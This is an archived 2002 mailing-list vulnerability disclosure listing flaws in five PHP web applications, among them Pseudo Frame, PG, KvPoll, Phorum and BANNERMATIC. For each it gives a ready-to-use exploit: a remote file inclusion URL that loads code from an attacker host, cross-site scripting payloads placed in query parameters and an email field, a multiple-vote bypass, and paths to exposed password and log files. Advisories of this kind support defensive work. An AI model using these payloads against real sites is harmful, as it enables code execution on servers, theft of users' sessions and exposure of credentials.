('binary' encoding is not supported, stored as-is) Product 1 : *********** Pseudo Frame 1.0 http://www.clicky-web.net Problem : - Including file Exploit : - http://www.site.com/index.php? page=http://www.haxor.com/file with file.php on http://www.haxor.com . Product 2 : *********** PG 1.0 http://www.clicky-web.net Problems : - XSS - Path Disclosure Exploits : - index.php?picture_n="% 20width=0><script>SCRIPT</script><img%20width=0% 20src="&gallery_name=path - index.php?picture_n=image.gif&gallery_name=non-existant- path Product 3 : *********** KvPoll 1.1 http://www.killervault.com Problem : - Skirting of safety against multiple vote Exploit : - /clear_cookies.php Product 4 : *********** Phorum 3.3.2a RC1 http://phorum.org Problem : - XSS Exploits : - /read.php?f=1&i=1&t=1"><form%20name=o><input%20name=u% 20value=XSS></form><script>alert(document.o.u.value) </script> - "><script>SCRIPT</script> in a message in the "email" input Product 5 : *********** BANNERMATIC V1, V2, V3 http://www.getcruising.com Problem : - Informations recovering Exploits : - /ban.log - /ban.bak - /ban.dat - /banmat.pwd frog-m@n
This archive was generated by hypermail 2b30 : Sun May 12 2002 - 09:01:34 PDT